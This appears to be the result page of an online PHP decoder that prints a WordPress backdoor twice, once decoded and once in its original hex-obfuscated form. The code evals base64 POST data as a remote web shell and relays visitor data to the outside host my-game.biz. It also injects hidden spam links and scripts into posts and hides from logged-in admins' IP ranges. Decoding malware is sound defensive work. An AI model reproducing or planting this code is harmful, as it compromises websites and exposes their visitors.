Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $pposte=$themes_css['theme']; if (isset($_POST[$pposte])) { @eval(base64_decode($_PO..

Decoded Output download

<?php $pposte=$themes_css['theme']; if (isset($_POST[$pposte])) { @eval(base64_decode($_POST[$pposte])); exit; } function qwc1() { global $wpdb, $table_prefix, $qwc1; $qwc2 = explode('.',$_SERVER["REMOTE_ADDR"]); if(sizeof($qwc2)==4){if ($wpdb->get_var("SELECT EXISTS (SELECT * FROM backupdb_".$table_prefix."lstat WHERE wp = '".$qwc2[0].'|'.$qwc2[1].'|'.$qwc2[2]."');")==1){$qwc1=1;}}} qwc1(); if ( is_user_logged_in() ) { global $wpdb, $table_prefix; if (! isset($qwc1)) { $qwc3 = ip2long($_SERVER["REMOTE_ADDR"]); if ($qwc3 == -1 || $qwc3 === FALSE) {} else { if($wpdb->get_var("SHOW TABLES LIKE 'backupdb_".$table_prefix."lstat'") == "backupdb_".$table_prefix."lstat") { $qwc3 = $qwc3-2560; for ($i = 1; $i < 20; $i++) { $qwc2 = explode('.',long2ip($qwc3+($i*256))); $wpdb->insert( "backupdb_".$table_prefix."lstat", array( 'wp' =>  $qwc2[0].'|'.$qwc2[1].'|'.$qwc2[2]));}}}}} if (! isset($qwc1)) { $qwc4 = 'a'.substr(md5($pposte),0,6); if (isset($_GET[$qwc4])) {$request = @wp_remote_retrieve_body(@wp_remote_get( "http://my-game.biz/index.php?a=".base64_encode($_GET[$qwc4]).'&b='.base64_encode($_SERVER["REMOTE_ADDR"]).'&c='.base64_encode($_SERVER["HTTP_USER_AGENT"]).'&d='.base64_encode(wp_get_referer()), array( "timeout" => 120 ) )); if (strstr($request,"<sleep>")) { $echo_n = explode("<sleep>",$request); $ott1 = base64_decode($echo_n[0]); if (strstr($ott1,'|')) { $head = explode('|',$ott1); foreach ($head as &$v1a) { header ($v1a);} }echo base64_decode($echo_n[1]); } exit; } function qwc0() { global $wpdb,$qwc4; $tpre = $wpdb->prefix; if($wpdb->get_var("SHOW TABLES LIKE 'backupdb_".$tpre."posts'") == "backupdb_".$tpre."posts") { $qwc5  = "backupdb_".$tpre; if ($tpre <> $qwc5) { $qwc0 = '<div id="'.$qwc4.'"><ul>'; wp_cache_flush(); $qwc6 = new wpdb(DB_USER, DB_PASSWORD, DB_NAME, DB_HOST); $qwc6->set_prefix( $qwc5 ); $qwc7 = $wpdb; $wpdb = $qwc6; $qwc8 = wp_get_recent_posts(20); foreach($qwc8 as $qwc9){$qwc0 =$qwc0 .'<li><a href="' . get_permalink($qwc9["ID"]) . '" title="'.$qwc9["post_title"].'" >' .   $qwc9["post_title"].'</a></li> ';} $wpdb = $qwc7; wp_cache_flush(); $qwc0 = $qwc0.'</ul><div><script type="text/javascript"> '."document.getElementById".'("'.$qwc4.'").'."style.display=".'"none"; </script>'; } else $qwc0 = ''; return $qwc0; } } function qvc0($qvc1) { GLOBAL $qwc4; if( is_single() ){ $qvc0 = preg_replace('/j\$k([0-9]{1,10})j\$k/', "<script type='text/javascript' src='".site_url('/?').$qwc4."=\$1'></script>", $qvc1, 1);} else { $qvc0=$qvc1; } return $qvc0;} add_filter('the_content', 'qvc0'); function qvc3($qvc3) { $qvc3 = preg_replace("/j\$k([0-9]{1,10})j\$k/", '', $qvc3); return $qvc3.qwc0(); } function qwc7() { ob_start("qvc3"); } function qwc5() { ob_end_flush(); } add_action("wp_head", "qwc7"); add_action("wp_footer", "qwc5"); function qvc5() { if( is_404() ) { GLOBAL $table_prefix, $wpdb, $qvc4; if (!isset($qvc4)) $qvc4 = $table_prefix; if($wpdb->get_var("SHOW TABLES LIKE 'backupdb_".$qvc4."posts'") == "backupdb_".$qvc4."posts") { if ( $table_prefix  <> "backupdb_".$qvc4) { $table_prefix="backupdb_".$qvc4; wp_cache_flush(); $qvc5 = new wpdb(DB_USER, DB_PASSWORD, DB_NAME, DB_HOST); $qvc5->set_prefix( $table_prefix ); $thedb = $wpdb; $wpdb = $qvc5; wp(); if (! have_posts() ) { $wpdb = $thedb; }}}}} add_action( "wp", "qvc5" ); } ?>

Did this file decode correctly?

Original Code

<?php $pposte=$themes_css['theme']; if (isset($_POST[$pposte])) { @eval(base64_decode($_POST[$pposte])); exit; } function qwc1() { global $wpdb, $table_prefix, $qwc1; $qwc2 = explode('.',$_SERVER["\x52\105\x4d\117\x54\105\x5f\101\x44\104\x52"]); if(sizeof($qwc2)==4){if ($wpdb->get_var("\x53\105\x4c\105\x43\124\x20\105\x58\111\x53\124\x53\40\x28\123\x45\114\x45\103\x54\40\x2a\40\x46\122\x4f\115\x20\142\x61\143\x6b\165\x70\144\x62\137".$table_prefix."\x6c\163\x74\141\x74\40\x57\110\x45\122\x45\40\x77\160\x20\75\x20\47".$qwc2[0].'|'.$qwc2[1].'|'.$qwc2[2]."\x27\51\x3b")==1){$qwc1=1;}}} qwc1(); if ( is_user_logged_in() ) { global $wpdb, $table_prefix; if (! isset($qwc1)) { $qwc3 = ip2long($_SERVER["\x52\105\x4d\117\x54\105\x5f\101\x44\104\x52"]); if ($qwc3 == -1 || $qwc3 === FALSE) {} else { if($wpdb->get_var("\x53\110\x4f\127\x20\124\x41\102\x4c\105\x53\40\x4c\111\x4b\105\x20\47\x62\141\x63\153\x75\160\x64\142\x5f".$table_prefix."\x6c\163\x74\141\x74\47") == "\x62\141\x63\153\x75\160\x64\142\x5f".$table_prefix."\x6c\163\x74\141\x74") { $qwc3 = $qwc3-2560; for ($i = 1; $i < 20; $i++) { $qwc2 = explode('.',long2ip($qwc3+($i*256))); $wpdb->insert( "\x62\141\x63\153\x75\160\x64\142\x5f".$table_prefix."\x6c\163\x74\141\x74", array( 'wp' =>  $qwc2[0].'|'.$qwc2[1].'|'.$qwc2[2]));}}}}} if (! isset($qwc1)) { $qwc4 = 'a'.substr(md5($pposte),0,6); if (isset($_GET[$qwc4])) {$request = @wp_remote_retrieve_body(@wp_remote_get( "\x68\164\x74\160\x3a\57\x2f\155\x79\55\x67\141\x6d\145\x2e\142\x69\172\x2f\151\x6e\144\x65\170\x2e\160\x68\160\x3f\141\x3d".base64_encode($_GET[$qwc4]).'&b='.base64_encode($_SERVER["\x52\105\x4d\117\x54\105\x5f\101\x44\104\x52"]).'&c='.base64_encode($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]).'&d='.base64_encode(wp_get_referer()), array( "\x74\151\x6d\145\x6f\165\x74" => 120 ) )); if (strstr($request,"\x3c\163\x6c\145\x65\160\x3e")) { $echo_n = explode("\x3c\163\x6c\145\x65\160\x3e",$request); $ott1 = base64_decode($echo_n[0]); if (strstr($ott1,'|')) { $head = explode('|',$ott1); foreach ($head as &$v1a) { header ($v1a);} }echo base64_decode($echo_n[1]); } exit; } function qwc0() { global $wpdb,$qwc4; $tpre = $wpdb->prefix; if($wpdb->get_var("\x53\110\x4f\127\x20\124\x41\102\x4c\105\x53\40\x4c\111\x4b\105\x20\47\x62\141\x63\153\x75\160\x64\142\x5f".$tpre."\x70\157\x73\164\x73\47") == "\x62\141\x63\153\x75\160\x64\142\x5f".$tpre."\x70\157\x73\164\x73") { $qwc5  = "\x62\141\x63\153\x75\160\x64\142\x5f".$tpre; if ($tpre <> $qwc5) { $qwc0 = '<div id="'.$qwc4.'"><ul>'; wp_cache_flush(); $qwc6 = new wpdb(DB_USER, DB_PASSWORD, DB_NAME, DB_HOST); $qwc6->set_prefix( $qwc5 ); $qwc7 = $wpdb; $wpdb = $qwc6; $qwc8 = wp_get_recent_posts(20); foreach($qwc8 as $qwc9){$qwc0 =$qwc0 .'<li><a href="' . get_permalink($qwc9["ID"]) . '" title="'.$qwc9["\x70\157\x73\164\x5f\164\x69\164\x6c\145"].'" >' .   $qwc9["\x70\157\x73\164\x5f\164\x69\164\x6c\145"].'</a></li> ';} $wpdb = $qwc7; wp_cache_flush(); $qwc0 = $qwc0.'</ul><div><script type="text/javascript"> '."\x64\157\x63\165\x6d\145\x6e\164\x2e\147\x65\164\x45\154\x65\155\x65\156\x74\102\x79\111\x64".'("'.$qwc4.'").'."\x73\164\x79\154\x65\56\x64\151\x73\160\x6c\141\x79\75".'"none"; </script>'; } else $qwc0 = ''; return $qwc0; } } function qvc0($qvc1) { GLOBAL $qwc4; if( is_single() ){ $qvc0 = preg_replace('/j\$k([0-9]{1,10})j\$k/', "<script type='text/javascript' src='".site_url('/?').$qwc4."=\$1'></script>", $qvc1, 1);} else { $qvc0=$qvc1; } return $qvc0;} add_filter('the_content', 'qvc0'); function qvc3($qvc3) { $qvc3 = preg_replace("\x2f\152\x5c\44\x6b\50\x5b\60\x2d\71\x5d\173\x31\54\x31\60\x7d\51\x6a\134\x24\153\x2f", '', $qvc3); return $qvc3.qwc0(); } function qwc7() { ob_start("qvc3"); } function qwc5() { ob_end_flush(); } add_action("\x77\160\x5f\150\x65\141\x64", "\x71\167\x63\67"); add_action("\x77\160\x5f\146\x6f\157\x74\145\x72", "\x71\167\x63\65"); function qvc5() { if( is_404() ) { GLOBAL $table_prefix, $wpdb, $qvc4; if (!isset($qvc4)) $qvc4 = $table_prefix; if($wpdb->get_var("\x53\110\x4f\127\x20\124\x41\102\x4c\105\x53\40\x4c\111\x4b\105\x20\47\x62\141\x63\153\x75\160\x64\142\x5f".$qvc4."\x70\157\x73\164\x73\47") == "\x62\141\x63\153\x75\160\x64\142\x5f".$qvc4."\x70\157\x73\164\x73") { if ( $table_prefix  <> "\x62\141\x63\153\x75\160\x64\142\x5f".$qvc4) { $table_prefix="\x62\141\x63\153\x75\160\x64\142\x5f".$qvc4; wp_cache_flush(); $qvc5 = new wpdb(DB_USER, DB_PASSWORD, DB_NAME, DB_HOST); $qvc5->set_prefix( $table_prefix ); $thedb = $wpdb; $wpdb = $qvc5; wp(); if (! have_posts() ) { $wpdb = $thedb; }}}}} add_action( "\x77\160", "\x71\166\x63\65" ); }

Function Calls

qwc1 1
sizeof 1
explode 1

Variables

$qwc2 None
$pposte None

Stats

MD5 c14fd46f96b3cf81c2a5d59689c2ce2a
Eval Count 0
Decode Time 111 ms